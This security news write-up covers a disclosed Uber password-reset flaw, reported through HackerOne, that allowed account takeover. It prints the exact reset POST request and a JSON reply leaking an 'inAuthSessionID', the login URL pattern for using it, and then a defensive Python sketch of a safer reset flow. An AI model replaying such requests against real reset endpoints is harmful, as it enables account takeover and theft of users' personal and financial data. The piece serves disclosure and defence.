Improper Authentication vulnerability allows anyone to reset password in UBER

An Italian security expert, Vincenzo C., who is popular on Twitter as @Procode701, has discovered a critical authentication vulnerability in UBER by which anyone can reset the password for any account.

The researcher found the ‘Improper Authentication’ vulnerability through the company's bug bounty program, which was operated by HackerOne.

A summary published by UBER explains, “With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.”

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The security expert found that the vulnerability in the password reset flow could be exploited to generate an authentication token, “inAuthSessionID”, which anyone could then use to change the password for any account.

Here is the UBER Improper Authentication flaw:

To change the password for any account, it was enough to obtain a session token “inAuthSessionID” and then use the standard link that is present in the change password form:

https://auth.uber.com/login/stage/PASTE SESSION ID/af9b9d0c-bb98-41de-876c-4cb911c79bd1

Here “PASTE SESSION ID” is the inAuthSessionID generated through the change password email, and af9b9d0c-bb98-41de-876c-4cb911c79bd1 is a tokenID with no expiration date.

POST /login/handleanswer HTTP/1.1
Host: auth.uber.com

{
    "init": false,
    "answer": {
        "type": "PASSWORD_RESET_WITH_EMAIL",
        "userIdentifier": {
            "email": "xxxx@uber.com"
        }
    }
}

Reply:

HTTP/1.1 200 OK

{
    "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
    "stage": {
        "question": {
            "signinToken": "",
            "type": "VERIFY_PASSWORD_RESET",
            "tripChallenges": []
        },
        "alternatives": []
    }
}

The impact of this vulnerability is very severe: it allows hackers to access any account and any user’s data (i.e. ID card, banking data, driver's license), including financial data.
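
A defensive sketch of the reset flow described in Uber's summary, added here as an example and not taken from Uber or the original post: the token is stored hashed with an expiry, delivered only to the mailbox, and never returned in the HTTP response. The function names, the 15-minute lifetime, the in-memory store and the sample address are assumptions.

```python
import hashlib
import json
import secrets
import time

TOKEN_TTL = 15 * 60            # assumed token lifetime in seconds
_store = {}                    # sha256(token) -> (email, expires_at); in-memory stand-in
outbox = []                    # stands in for the mail system: (email, token)
USERS = {"rider@example.com"}  # constructed sample account


def start_reset(email, now=None):
    """Handle a reset request; return the JSON body sent back to the HTTP client."""
    now = time.time() if now is None else now
    if email in USERS:
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        _store[digest] = (email, now + TOKEN_TTL)  # only the hash is kept server-side
        outbox.append((email, token))              # the token leaves only via the mailbox
    # Same body for known and unknown addresses, with no token or session field.
    return json.dumps({"stage": {"question": {"type": "VERIFY_PASSWORD_RESET"}}})


def redeem(token, now=None):
    """Return the account email if the token is valid, unexpired and unused."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    entry = _store.pop(digest, None)               # pop makes the token single-use
    if entry is None:
        return None
    email, expires_at = entry
    return email if now <= expires_at else None


def response_leaks_secret(body, secrets_issued):
    """Regression check: True if any issued token appears in the response body."""
    return any(tok in body for tok in secrets_issued)
```

Running `response_leaks_secret` against every reset response in an integration test catches a regression of the kind described in the summary, where the token came back in the reply.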
